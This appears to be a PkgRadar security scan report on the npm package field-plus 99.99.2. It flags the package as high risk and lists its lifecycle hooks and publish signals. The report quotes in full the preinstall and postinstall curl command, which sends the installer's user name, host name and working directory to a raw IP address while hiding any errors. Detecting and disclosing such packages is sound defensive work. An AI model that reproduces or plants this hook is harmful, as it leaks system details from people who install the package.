npm · registry.npmjs.org
field-plus
Install Lifecycle Repeated Payload: preinstall,postinstall="curl -s 'http://3.7.226.146:9000/callback?user=$(whoami)&host=$(hostname)&pwd=$(pwd)&ts=$(date +%s)' > /dev/null 2>&1 || true"
Why PkgRadar flagged 99.99.2
| Severity | Signal | Evidence |
|---|---|---|
| high | Install Lifecycle Repeated Payload | preinstall,postinstall="curl -s 'http://3.7.226.146:9000/callback?user=$(whoami)&host=$(hostname)&pwd=$(pwd)&ts=$(date +%s)' > /dev/null 2>&1 || true" · package.json |
| high | New Account With Lifecycle Hook | package first published 7 day(s) ago, 3 total version(s), has lifecycle hook · package.json |
| high | Install Lifecycle Suppresses Failure | preinstall="curl -s 'http://3.7.226.146:9000/callback?user=$(whoami)&host=$(hostname)&pwd=$(pwd)&ts=$(date +%s)' > /dev/null 2>&1 || true" · package.json |
| high | Install Lifecycle Suppresses Failure | postinstall="curl -s 'http://3.7.226.146:9000/callback?user=$(whoami)&host=$(hostname)&pwd=$(pwd)&ts=$(date +%s)' > /dev/null 2>&1 || true" · package.json |
| medium | Suspicious Publish Context | {"package_age_days":7,"publisher":"palanichamy_perumal","burst_same_day":1,"burst_week":1,"lure":null,"version_anomaly":true,"new_account":true} |
Scanned versions
| Version | Verdict | Score | Scanned (UTC) |
|---|---|---|---|
99.99.2 | High risk | 85 | 2026-06-15 |
99.99.1 | High risk | 165 | 2026-06-15 |
1.0.0 | Low risk | 0 | 2026-06-08 |
Related campaigns
- palanichamy_perumal — 2 releases, max score 165
- new_account_with_lifecycle_hook:package first published 7 day(s) ago, 3 total version(s), has lifecycle hook — 12 releases, max score 85
Block this in CI
pkgradar gate --ecosystem npm [email protected]